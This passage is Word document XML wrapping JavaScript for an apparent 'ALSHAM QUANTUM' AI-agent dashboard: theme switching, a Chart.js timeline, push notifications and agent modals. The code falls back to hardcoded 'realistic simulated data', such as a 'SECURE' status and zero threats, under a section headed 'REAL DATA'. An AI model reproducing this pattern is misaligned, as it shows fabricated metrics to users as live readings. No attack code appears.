    <w:p w14:paraId="3B2180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(this.lastData?.agents?.[agentName]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E1D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return this.generateRealMetrics(agentName, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D008B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basic_metrics: this.lastData.agents[agentName]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC5E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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BA3E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7F444AB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FB3F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Last resort: realistic simulated data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B70A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fallbackData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16138D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core: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072B63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'Current Performance': '87.4%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A70E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'Cycles Executed': '127',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4F1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'Trials Completed': '3,847',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF376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'Processing Time': '2.1s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F80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'Memory Usage': '72.3%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BDF4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'CPU Usage': '58.7%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065390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'Success Rate': '91.2%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED339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185DFA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learn: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B17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'Performance': '89.2%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8306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'Accuracy': '96.8%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109DE1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'Training Cycles': '94',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D172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'Samples Processed': '247,392',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529DE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'Epochs Completed': '156',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125315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'Model Type': 'Quantum Neural Network',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186097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'Convergence Time': '3.4s'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9076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5D0E2C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guard: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D067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'System Uptime': '99.97%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2370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'Security Status': 'SECURE',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395A0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'Checks Performed': '8,924',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E301F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'Threats Detected': '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3736EE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'Response Time': '0.08s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517666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'Security Score': '99.1%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463AE1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'Protocol': 'Quantum Shield Protocol'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD6CB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5A4D2C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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9E9B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4047B4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fallbackData[agentName] || {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E639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0257C2F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2919DF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async sendQuantumPushNotification(eventData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B26F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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BFB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('serviceWorker' in navigator) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0764F2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registration = await navigator.serviceWorker.ready;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B202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(registration.pushManager) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610C4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registration.showNotification('ALSHAM QUANTUM Alert', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5A0C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body: eventData.message,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65927D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icon: 'data:image/svg+xml,&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 192 192"&gt;&lt;defs&gt;&lt;linearGradient id="grad" x1="0%" y1="0%" x2="100%" y2="100%"&gt;&lt;stop offset="0%" style="stop-color:#F4D03F;stop-opacity:1" /&gt;&lt;stop offset="100%" style="stop-color:#6C3483;stop-opacity:1" /&gt;&lt;/linearGradient&gt;&lt;/defs&gt;&lt;rect width="192" height="192" fill="url(#grad)" rx="20"/&gt;&lt;text x="96" y="110" font-family="Orbitron" font-size="28" font-weight="bold" text-anchor="middle" fill="white"&gt;QUANTUM&lt;/text&gt;&lt;circle cx="96" cy="60" r="20" fill="white" opacity="0.8"/&gt;&lt;/svg&gt;',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF7D9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tag: 'quantum-cycle',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225763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requireInteraction: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90A5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vibrate: [200, 100, 200]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012719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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408E6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747B3C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36DF46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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C69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console.log('Push notification not available:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417637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6F4253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E974C33" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D532C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destroy() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD93A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this.stopHeartbeat();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB0EC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this.stopSimulation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20711F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(this.ws) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF63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this.ws.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B03BF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69E8CF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362FC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77C9955" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721310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QUANTUM THEME SYSTEM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D92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class QuantumThemeSystem {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669892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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0629FC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this.currentTheme = 'quantum-glass';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C70E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this.bindEvents();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5691FF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this.loadSavedTheme();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A042C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D2C9B52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434F6A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bindEvents() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCA9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document.querySelectorAll('.theme-btn').forEach(btn =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CD91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btn.addEventListener('click', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61620B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theme = e.target.dataset.theme;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09567E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(theme) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D9B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this.switchTheme(theme);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC579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68D6A9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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B8D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1DA13A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D5D4738" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E821B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switchTheme(themeName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078A1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document.querySelectorAll('.theme-btn').forEach(btn =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED048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btn.classList.remove('active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773C4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6F42E0AF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B293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activeBtn = document.querySelector(`[data-theme="${themeName}"]`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF84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(activeBtn) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6251DA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activeBtn.classList.add('active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947CB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5269EE0C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DE18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document.body.className = `theme-${themeName}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175728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this.currentTheme = themeName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C9D59B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1456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(window.quantumParticlesSystem) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46361A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window.quantumParticlesSystem.updateTheme();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2495ED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6B53132" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102D1A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localStorage.setItem('alsham-quantum-theme', themeName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D61DB03" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1BD8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(window.quantumSoundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B30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window.quantumSoundDesign.play('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DFB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167B9E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F8D1FE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040CA1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loadSavedTheme() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73901C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savedTheme = localStorage.getItem('alsham-quantum-theme');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94F8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(savedTheme) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE17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this.switchTheme(savedTheme);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D728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063371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EA7DA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8830FDF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2704A6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NEURAL CHART SYSTEM =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787315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function initializeNeuralChart() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721AE2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ctx = document.getElementById('timelineChart');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6C73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(!ctx) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6D004" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1586E9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chartData = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0B2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labels: ['12:00', '12:10', '12:20', '12:30', '12:40', '12:50', '13:00'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC7F9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datasets: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC32D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C2FE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label: 'Neural Performance (%)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF38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data: [78, 82, 85, 81, 87, 89, 86],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242435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borderColor: '#F4D03F',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16B5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backgroundColor: 'rgba(244, 208, 63, 0.1)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4D88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tension: 0.4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8252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fill: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7596B0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30FF2F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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D759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label: 'Processing Cycles/min',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089FB5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data: [6, 8, 7, 9, 11, 8, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720881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borderColor: '#9333EA',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BC0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backgroundColor: 'rgba(147, 51, 234, 0.1)',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3C8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tension: 0.4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DFBD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yAxisID: 'y1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667872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35C467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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC680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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3E1DED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360EE7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window.neuralTimelineChart = new Chart(ctx, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9D6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type: 'line',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30B6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data: chartData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE47F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options: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EFA6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responsive: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C256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maintainAspectRatio: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278050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interaction: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00990A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intersect: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F32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mode: 'index'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBDCC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3F67AF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plugins: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D318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legend: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854C8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labels: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A749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color: '#ffffff',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ACE1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font: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41E7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family: 'Inter',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716342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size: 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F46B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C375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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537613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73E593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496028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scales: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090339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x: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC19F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grid: { color: 'rgba(255, 255, 255, 0.1)' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1FD7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ticks: { color: '#ffffff', font: { size: 10 } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BE2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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FC6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y: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2343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grid: { color: 'rgba(255, 255, 255, 0.1)' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E96C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ticks: { color: '#ffffff', font: { size: 10 } },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED39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beginAtZero: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B217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max: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104679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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB389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y1: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7E5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type: 'linear',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D20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display: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A9F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position: 'right'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E2D5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111A76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3F4C45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6C1148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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F32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DD6B941" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718DD8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MODAL SYSTEM WITH REAL DATA =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C67A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async function openAgentModal(agentType) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5061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modal = document.getElementById('agent-modal');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC4DB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title = document.getElementById('modal-title');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57268C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body = document.getElementById('modal-body');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF48E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D128C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(!modal || !title || !body) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2EA9A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DEFA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Show loading state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3CD1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title.textContent = 'Loading Neural Agent Data...';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A325D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body.innerHTML = '&lt;div class="text-center py-8"&gt;&lt;i class="fas fa-spinner fa-spin text-2xl"&gt;&lt;/i&gt;&lt;p class="mt-4"&gt;Accessing neural network...&lt;/p&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B9F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modal.classList.add('active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299188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modal.setAttribute('aria-hidden', 'false');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F27A7CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5D40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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778192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Fetch real data from WebSocket manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D189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let realMetrics = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A766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(window.quantumWebSocketManager) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E22B9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realMetrics = await window.quantumWebSocketManager.fetchAgentDetails(agentType);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2541B5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64CB4BB3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6623F0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agentConfig = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD46D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core: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F681D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title: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Core Intelligence - Neural Processing Engine',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083453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description: 'Advanced quantum-powered neural processing system responsible for continuous optimization and intelligent decision-making within the ALSHAM QUANTUM platform.',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8408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capabilities: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164913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'Quantum Machine Learning algorithms with Bayesian optimization',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F7A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'Real-time hyperparameter tuning and model selection',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119743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'Dynamic feature engineering with neural networks',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730CDE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'Automated model architecture optimization',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB16E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'Performance monitoring and predictive analytics'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E903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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3598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55279A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learn: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6879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title: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Learning Engine - Adaptive Neural Networks',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA29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description: 'Self-evolving learning system with advanced neural architectures for continuous improvement and adaptation within the ALSHAM QUANTUM ecosystem.',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152315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capabilities: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF379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'Deep Learning with quantum-enhanced neural networks',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A3C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'Transfer Learning with enterprise-grade adaptation',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C647B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'Meta-learning for rapid model convergence',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E934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'Neural Architecture Search with quantum optimization',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E988E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'Continual Learning with catastrophic forgetting prevention'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D96F0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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A61B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59760D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guard: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAFF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title: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Matrix - Enterprise Protection System',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58326A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description: 'Comprehensive security and monitoring system with quantum-enhanced threat detection for enterprise-grade protection of the ALSHAM QUANTUM platform.',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211968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capabilities: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAE2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'Quantum-powered anomaly detection algorithms',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10704B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'Real-time threat intelligence and analysis',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F01F1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'Behavioral analysis with machine learning',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889F7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'Automated incident response and recovery',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC0A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'Enterprise security policy enforcement'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D518A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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3537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309362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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212BA4C9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225D6D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agent = agentConfig[agentType];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D3B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(!agent) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492B416C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7997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title.textContent = agent.title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A612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581E3E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body.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56A9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class="mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AE47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&lt;h4 class="text-lg font-semibold mb-2"&gt;System Overview&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F663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&lt;p class="text-sm opacity-90"&gt;${agent.description}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754C91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156B91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5AB3B6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class="mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78F4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&lt;h4 class="text-lg font-semibold mb-3"&gt;Neural Capabilities&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A56E8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&lt;ul class="space-y-2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E85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${agent.capabilities.map(cap =&gt; `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F9D6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&lt;li class="flex items-center text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAE36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&lt;i class="fas fa-check-circle mr-2 text-green-400"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797312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${cap}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E980D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&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4664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`).join('')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E7F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&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7C2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4C86AC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658BA4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class="mb-6"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3927A0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&lt;h4 class="text-lg font-semibold mb-3"&gt;Real-time Metrics&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40569B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class="grid grid-cols-1 md:grid-cols-2 gap-4"&gt;</w:t>
      </w:r>
    </w:p>
